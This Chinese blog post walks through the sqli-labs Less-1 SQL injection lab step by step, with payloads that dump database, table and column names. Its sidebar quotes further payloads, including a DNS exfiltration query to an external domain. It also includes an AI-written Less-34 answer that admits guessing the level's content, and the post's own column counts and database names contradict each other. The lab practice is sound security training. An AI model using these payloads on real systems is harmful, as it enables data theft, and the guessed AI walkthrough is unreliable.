在线sqli-labs 通关大全 Less-1

最新推荐文章于 2024-10-23 16:51:41 发布
原创 最新推荐文章于 2024-10-23 16:51:41 发布 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍在sqli-labs平台上进行SQL注入实验的过程,包括FireFox插件HackBar使用、字符型注入判断、数据库名、表名及列名爆破等核心步骤。通过实例展示如何手工注入,奠定扎实基础。

sqli-labs (1)

sqli-labs实验前:

本人因在sqli-labs搭建过程中遇到大量问题,百度后依旧无果,所以现决定在在线sqli-labs平台进行试验。
sqli-labs在线平台: http://43.247.91.228:84/

在这里插入图片描述
在线平台sqli-labs Page-1 点击Less-1可直接进行试验
在这里插入图片描述

一.知识点

1.FireFox插件HackBar使用
2.字符型注入:注意单引号闭合
3.sqlmap这里暂时不使用,想了解的可以自己尝试,刚开始手工注入扎扎实实打基础较好。
4.字符型注入判断

(1)判断注入

?id=1' and 1=1 --+ 返回正确
?id=1' and 1=2 --+ 返回错误

(2)猜字段

?id=1' order by 2 --+ 返回正确
?id=1' order by 3 --+ 返回错误 

得出字段数为 2

下面为测试空格字符代替情况 (可跳过)

?id=1' order by 2 -- - 返回正确
?id=1' order by 2 -- / 返回正确

(3)爆数据库名

?id=1' and 1=2 union select 1,database()--+

得到数据库sqli

(4)爆表名

?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'--+

(5)爆列名

?id=1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+

(6)爆字段内容(flag)

?id=1' and 1=2 union select 1,group_concat(flag) from sqli.flag--+

二.题解

注:以下解题步骤大多以图片显示不再做过多解释

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
字段为3的时候显示正常,字段为4时显示错误,所以最终字段为3
在这里插入图片描述
数据库名为security
在这里插入图片描述
因为第二步爆出有3个字段,所以select后面要跟3个字段,下面这张图片为跟了两个字段时的情形会显示错误
在这里插入图片描述
爆出的表名有四个:emails,referers,uagents,users
在这里插入图片描述
上面四个表名中uagents,users两个表名最可疑,经过尝试在users表中得到了payload如下图
在这里插入图片描述
总结:字符型注入可以按照以上六步进行手工尝试最后得到payload

推荐:最后给大家推荐几个sql或者其他漏洞学习方面不错的网站
sql整数型/字符型注入: https://www.cnblogs.com/threesoil/p/12431496.html

ctf wiki: https://ctf-wiki.github.io/ctf-wiki/web/sqli-zh/

狼组知识库web方面: https://wiki.wgpsec.org/knowledge/web/

ctfhub sql注入wp: https://www.cnblogs.com/0yst3r-2046/p/12469632.html(最后这个是来自ctfhub学习中偶然看到的一位不认识的大佬,ta的ctf wp都挺详细的大家也可以多做学习)

SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 412
SQLI-LABS
sqli-labs闯关1-1
Darklord.W
06-30 577
sqli-labs闯关1-1 在线练习网址http://43.247.91.228:84/ 首先,进入sqli-labs 1-1 输入http://43.247.91.228:84/Less-1/?id=1 输入http://43.247.91.228:84/Less-1/?id=1’ 用and1=1和and1=2,结果显示它为字符型注入 http://43.247.91.228:84/Less-...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs(less-1)
墨鱼菜鸡
09-10 727
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数 4.利用函数database(),user(),version()可以得到...
在线sqli-labs 通关大全 Less-2
qq_44985415的博客
08-29 625
sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期。——卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 concat():联合数据,用于联合两条数据结果。如 concat(username,0x3a,password) group_concat():和 concat() 类似,如 group_concat(DISTINCT+user,0x3a,password),用于把多条数据一次注入出来 concat_ws():用
sqli-labs通关笔记
m0_67795959的博客
10-23 1226
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 2002
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3351
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labssqli-labs 靶场通关1-16)
m0_71944965的博客
09-02 793
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】sqli-labs 靶场通关1-16)sqli-labs第一关 sqli-labs第一关 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1206
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
在线sqli-labs 通关大全 Less-3
qq_44985415的博客
08-31 513
sqli-labs (2) 励志语录 学习知识要善于思考,思考,再思考。——爱因斯坦 1.知识点 (1)字符型:’) (2)sqlmap使用 2.题解 注:因题目简单所以下解题步骤大多以图片显示不再做过多解释 方法一:手工注入 图一 图二 注意看图二图三有什么不同,图二是第三关的,而图三是第一关的解题步骤,本关sql注入在单引号的条件下又多了一个右括号,因此想绕过需要把右括号也加上 图三 右括号加上之后在进行实验发现返回结果正常 图四 猜字段 图五 用下面这条语句爆库名,将id=1换成了id=-1,因
sqli-labs (less-1)
kukudeshuo的博客
03-07 303
sqli-labs (less-1) SQL注入介绍 SQL注入就是指Web应用程序对用户输入数据的合法性判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作 sql注入漏洞的产生需要满足以下两个条件: 1.参数用户可控:前端传给后端的参数内容是用户可以控制的。 2.参数代入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 Mysql5.0之后的版本,数据库里面会默认存放一个information_schema的库,这个库可以说
Sqli-labsLess-1
m0_46315342的博客
06-04 397
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧!                                   ...
sqli-labs less-1
zbbjya的博客
02-08 560
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
Sqli-Labsless-1
ISNS的博客
02-03 1903
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
web靶场 --- sqli-labs
L0g1c的博客
07-06 1901
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 834
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
Sqli-LabsLess-1
weixin_44227437的博客
05-04 471
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
sqli-labs靶场通关less34
最新发布
11-29
<think> 首先,用户查询的是sqli-labs靶场less34关卡的通关方法。Sqli-labs是一个用于学习SQL注入的靶场,less34可能指的是第34关。 从提供的引用来看: - 引用[1]提到了Sqli-labs-less-9,涉及到SQL注入的条件。 - 引用[2]列出了从less54到less65的一些通关方法,包括注入示例。 - 引用[3]提到了第十关。 - 引用[4]是关于第12关的,使用post请求和sqlmap。 用户的具体问题是关于less34的,但引用中没有直接提到less34。我需要基于SQL注入的常识来构建一个合理的通关方法。 回想一下,Sqli-labs的关卡通常涉及不同类型的SQL注入: - Less34可能是基于post请求的注入,因为引用[4]提到post请求。 - 一般关卡名如less34可能对应特定的漏洞类型,比如基于时间的盲注或错误注入。 在标准Sqli-labs中: - Less1-10是基本的注入。 - Less34可能是一个特定的关卡,我需要假设它是基于post请求的注入,因为用户提到"less34",而引用[4]是关于post请求的。 用户说:"我想获取sqli - labs靶场less34关卡的通关方法",所以我需要提供步骤。 从系统指令: - 我必须使用中文回答。 - 行内数学表达式用$...$,但这里可能不涉及数学,所以可能不需要。 - 独立公式用$$...$$,但同样可能不需要。 - 生成相关问题。 - 在回答中引用的段落末尾添加引用标识,如[^1]。 引用部分在用户消息中是给定的,所以我应该参考它们。引用[2]提到了各种注入方法,如updatexml的使用,这在盲注中常见。 构建回答: 1. 解释关卡:假设less34是一个post请求的注入关卡。 2. 步骤: - 识别注入点。 - 测试注入类型(基于错误、布尔盲注、时间盲注)。 - 使用工具如sqlmap或手动注入。 3. 基于引用[4],提到使用burp抓包和sqlmap。 可能的通关方法: - 使用burp suite抓取请求。 - 保存请求到文件。 -sqlmap扫描。 - 或者手动注入,如使用' or 1=1 -- 等。 添加引用:在相关部分末尾添加[^数字]。 生成相关问题: - 例如:1. 如何手动测试SQL注入漏洞?2. sqlmap工具的使用方法?3. 如何防御SQL注入? 确保回答结构清晰: - 引言:介绍less34。 - 步骤:详细步骤。 - 代码示例:如果有。 - 相关问题。 最终回答格式: - 使用中文。 - 自然添加引用。 - 结尾有相关问题。 </think>### Sqli-labs 靶场 Less-34 通关详解 Sqli-labsLess-34 关卡通常涉及基于 POST 请求的 SQL 注入漏洞,目标是通过注入获取数据库信息(如数据库名、表名或用户数据)。这一关可能需要使用工具辅助测试,因为它是 POST 表单提交的场景。以下是基于 SQL 注入原理和常见靶场实践的逐步通关方法(假设靶场环境已搭建好)。 #### 步骤 1: 识别注入点 - **访问关卡页面**:打开 Less-34 页面(URL 类似 `http://localhost/sqli-labs/Less-34/`)。页面通常包含一个登录表单(用户名和密码输入框),这是潜在的注入点。 - **测试参数可控性**:输入单引号 `'` 或其他特殊字符(如 `"` 或 `\`),观察页面响应。如果出现数据库错误(如 MySQL 语法错误),则表明参数未充分过滤,存在注入漏洞。SQL 注入的三个条件包括参数可控、过滤不彻底和参数带入数据库执行[^1]。 - **示例测试**: - 在用户名框输入 `' or 1=1 -- `(注意末尾空格),密码框随意输入(如 `test`)。如果登录成功,说明存在布尔盲注漏洞。 #### 步骤 2: 手动注入测试(基于错误) - **利用错误回显**:Less-34 可能支持基于错误的注入,使用 `updatexml()` 函数提取信息。这在类似关卡(如 Less-58)中常见[^2]。 - 在用户名框输入:`' and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) -- ` - 密码框输入任意值(如 `123`)。 - **解释**:`updatexml()` 会触发 XML 解析错误,并回显当前数据库名(`database()`)。错误消息中会包含 `~database_name~` 格式的信息。 - 如果成功,错误消息会显示数据库名(如 `~security~`)。 - **获取更多数据**: - 查询表名:替换注入 payload 为 `' and updatexml(1, concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1), 0x7e), 1) -- `。这会返回第一个表名。 - 查询列名:如 `' and updatexml(1, concat(0x7e, (select column_name from information_schema.columns where table_name='users' limit 0,1), 0x7e), 1) -- `,获取 `users` 表的列名。 #### 步骤 3: 使用 sqlmap 自动化工具(推荐) 对于 POST 请求,手动注入可能繁琐,sqlmap 能自动完成漏洞利用。参考 Less-12 的方法[^4]: 1. **捕获请求**:使用 Burp Suite 抓包。 - 提交表单(如用户名 `test`,密码 `test`),Burp 会捕获 POST 请求。 - 保存请求数据到文件(如 `less34.txt`),内容示例: ``` POST /sqli-labs/Less-34/ HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 25 uname=test&passwd=test ``` 2. **运行 sqlmap**: - 命令:`sqlmap -r less34.txt --batch --dbs`(`--batch` 自动确认,`--dbs` 获取所有数据库名)。 - 如果注入点正确,sqlmap 会返回数据库列表(如 `security`)。 - 进一步获取表名:`sqlmap -r less34.txt --batch -D security --tables`。 - 获取数据:`sqlmap -r less34.txt --batch -D security -T users --dump`(导出 `users` 表数据)。 3. **结果示例**:成功后会显示类似: ``` Database: security Table: users +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | admin | admin_pass | +----+----------+------------+ ``` #### 关键注意事项 - **防御绕过**:如果关卡有过滤,尝试编码 payload(如 URL 编码 `'` 为 `%27`)。 - **环境依赖**:确保靶场运行正常(如使用 Docker 或 XAMPP)。如果注入失败,检查错误日志或调整 payload。 - **原理引用**:SQL 注入的核心是参数未过滤导致恶意代码执行[^1],本方法基于常见盲注技术[^2][^4]。 通过以上步骤,您应能成功通关 Less-34。如果遇到问题,可提供具体错误截图以便进一步诊断。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值